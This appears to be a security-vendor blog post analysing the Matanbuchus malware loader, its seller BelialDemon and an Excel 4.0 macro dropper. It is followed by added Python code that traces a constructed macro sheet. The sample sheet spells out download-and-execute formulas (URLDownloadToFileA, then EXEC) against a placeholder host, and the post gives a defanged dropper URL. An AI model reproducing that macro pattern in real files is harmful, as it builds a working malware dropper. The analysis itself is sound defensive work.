Unit 42 researchers often spend time investigating what we call non-traditional sources. Non-traditional sources often include underground marketplaces and sites, spanning from forums on the Tor network to Telegram channels and other marketplaces. One such case that we investigated involves a threat actor called BelialDemon, who is a member of several underground forums and marketplaces. In February 2021, BelialDemon advertised a new malware-as-a-service (MaaS) called Matanbuchus Loader and charged an initial rental price of $2,500. Malware loaders are malicious software that typically drop or pull down second-stage malware from command and control (C2) infrastructures.

We discovered several organizations impacted by Matanbuchus including a large university and high school in the United States, as well as a high-tech organization in Belgium.

After observing the user BelialDemon operating in well-established underground forums, we’ve noticed they stick to a particular biblical theme: their name, Belial, along with the name of their new loader, Matanbuchus, stem from the Ascension of Isaiah 2:4: "And Manasseh turned aside his heart to serve Belial for the angel of lawlessness, who is the ruler of this world, is Belial, whose name is Matanbuchus.” A fitting theme for their operations. This blog sheds light on Matanbuchus, BelialDemon and the malware’s infrastructure.

If we look historically, BelialDemon has been involved in the development of malware loaders. BelialDemon is considered the primary developer of TriumphLoader, a loader previously posted about on several forums, and has experience with selling this type of malware.

Forum posting of BelialDemon showcasing a loader.

Looking over posts such as these in Figure 1, we’ll attempt to locate the files through a litany of means to better understand the functionality of the malware and analyze its activity in the wild – allowing for better protections and enriched intelligence. BelialDemon was specifically looking to recruit three people as part of their MaaS offering, charging an initial rental price of $2,500.

Since we have a name for the malware direct from the source, we subsequently went hunting for samples of Matanbuchus used in the wild.

Hunting for a sample of Matanbuchus unearthed a file in the wild called ddg.dll, which is actively being dropped via hxxp://idea-secure-logincom. Looking at some of the included strings showed we were on the right track.

Strings showing MatanbuchusDroper.dll.

As stated by the malware author, the loader has the following features:

The question then becomes what does it actually look like in the wild?

The Excel Dropper

After identifying the Microsoft Excel document (SHA256: 41727fc99b9d99abd7183f6eec9052f86de076c04056e224ac366762c361afda) as an initial vector of an attack that drops the Matanbuchus Loader DLL, we begin our analysis on this file. When opening the Excel document, you're met with the notification that you need to enable macros to view the actual content of the document. This file is using a technique more recently favored in attacks leveraging Microsoft Office documents. Specifically, there has been a shift from Microsoft Word to Microsoft Excel when trying to launch malicious payloads on victims’ systems. This shift is because, using Excel's built-in functions, it is possible to store code distributed throughout the spreadsheet cells, offering a native obfuscation that hampers analysis and detection.

This is colloquially referred to as Excel 4.0 Macros. The cells with data will spread across a sea of blank ones which, when executed, will piece together the information. In the example above, note how some of the visible cells in the B column refer to columns and rows across the sheet. This GOTO function tells Excel to select a specific cell hundreds of columns over and 1,595 rows down. These types of actions are chained together, and in this document, perform a simple download and execution of said file. By removing the blank cells in the document and reviewing the resulting strings, there are many interesting standouts that align with the observed behavior of this file in our WildFire malware analysis engine.

Taking these at face value, we can see a breakdown in functionality for downloading a file to a certain location and the execution of it.
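The analysis step the Excel 4.0 macro passage describes (drop the blank cells, follow the GOTO chain, read the strings that remain) as an added Python example; this is not code from the Unit 42 write-up, and the sheet contents, URL and file path are constructed placeholders, not values from the analysed document.

```python
import re
from typing import Dict, List, Tuple
Cell = Tuple[int, int]  # (row, column), 1-based, as in Excel's R1C1 references

# Constructed sample sheet (not the analysed document): a few formulas scattered across
# a sea of blank cells and chained with GOTO jumps; argument lists are simplified placeholders.
SAMPLE_SHEET: Dict[Cell, str] = {
    (1, 2): "=GOTO(R1596C300)",  # visible in column B, jumps 1,595 rows down
    (2, 2): "",                   # blank cell, dropped by the analysis
    (1596, 300): '=SET.NAME("u","hxxp://example.invalid/stage.bin")',
    (1597, 300): '=SET.NAME("p","C:\\Users\\Public\\stage.dll")',
    (1598, 300): "=GOTO(R5C420)",
    (5, 420): '=CALL("urlmon","URLDownloadToFileA",u,p)',
    (6, 420): "=EXEC(p)",
    (7, 420): "=HALT()",
}
SUSPICIOUS = ("CALL", "EXEC", "REGISTER", "URLDownloadToFileA", "ShellExecute")  # download/execute/import
GOTO_RE = re.compile(r"^=GOTO\(R(\d+)C(\d+)\)$", re.IGNORECASE)
STRING_RE = re.compile(r'"([^"]*)"')

def nonblank_cells(sheet: Dict[Cell, str]) -> Dict[Cell, str]:
    """Drop the blank cells so only the real content remains."""
    return {pos: f for pos, f in sheet.items() if f and f.strip()}

def sparsity(sheet: Dict[Cell, str]) -> Tuple[int, int]:
    """(populated cells, cells in the bounding box): how thinly the code is spread."""
    cells = nonblank_cells(sheet)
    return len(cells), max(r for r, _ in cells) * max(c for _, c in cells)

def walk_macro(sheet: Dict[Cell, str], start: Cell, max_steps: int = 10_000) -> List[str]:
    """Follow control flow from `start`: fall through to the next row, jump on GOTO;
    stop on HALT, a missing cell, a revisited cell (loop) or the step cap."""
    cells, seen, trace, cur = nonblank_cells(sheet), set(), [], start
    while cur in cells and cur not in seen and len(trace) < max_steps:
        seen.add(cur)
        formula = cells[cur].strip()
        trace.append(formula)
        jump = GOTO_RE.match(formula)
        if jump:
            cur = (int(jump.group(1)), int(jump.group(2)))
        elif formula.upper().startswith("=HALT("):
            break
        else:
            cur = (cur[0] + 1, cur[1])
    return trace

def extract_indicators(trace: List[str]) -> Dict[str, List[str]]:
    """Collect string literals and flagged function names from the executed formulas."""
    strings = [s for f in trace for s in STRING_RE.findall(f)]
    funcs = sorted({n for f in trace for n in SUSPICIOUS if n.lower() in f.lower()})
    return {"strings": strings, "suspicious_functions": funcs}
```

Running `extract_indicators(walk_macro(SAMPLE_SHEET, (1, 2)))` yields the download URL, the drop path and the CALL/EXEC/URLDownloadToFileA names in execution order, the same "standouts" an analyst looks for once the blank cells are gone.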